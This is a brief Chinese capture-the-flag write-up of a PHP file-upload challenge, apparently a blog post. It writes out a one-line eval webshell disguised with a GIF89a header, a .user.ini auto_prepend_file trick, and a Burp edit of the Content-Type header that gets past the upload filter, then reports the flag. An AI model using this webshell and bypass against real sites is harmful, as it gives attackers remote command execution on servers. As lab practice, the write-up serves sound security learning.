文件上传题目
直接上传一句话木马是不行的
所以考虑绕过
一句话木马里肯定不能有php字样, <?php @eval($_POST['1']);?> 这种是不行的
可以用这种 <?=eval($_REQUEST['cmd']);?>
在文件头部添加一个图片的文件头来绕过
合起来一句话木马内容就是
GIF89a
<?=eval($_REQUEST['cmd']);?>
保存为jpg格式
这里还需要提前上传一个.user.ini文件
内容如下
GIF89a
auto_prepend_file=a.jpg
可以借助.user.ini让所有php文件都“自动”包含某个文件,这个文件可以是一个正常php文件,也可以是一个包含一句话木马的webshell。
直接上传.user.ini也是不行的
开启burp拦截抓包,将.user.ini文件上传上去
将抓取的包中的Content-Type: application/octet-stream 修改为 Content-Type: image/jpg
放行,上传成功
下一步按F12打开调试器选择网络查看上传文件的地址,上传a.jpg文件,可以直接上传
接下来使用蚁剑连接
找到flag文件
发现cyberpeace{265e7f5405ff29bbb6e92c83792c1433}
遇到的问题:蚁剑连接后经常掉线,出现文件不可访问等问题,刷新一下网站场景页面就可以了
参考文章链接:https://blog.csdn.net/Myon5/article/details/128469947
扫一扫
8725
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
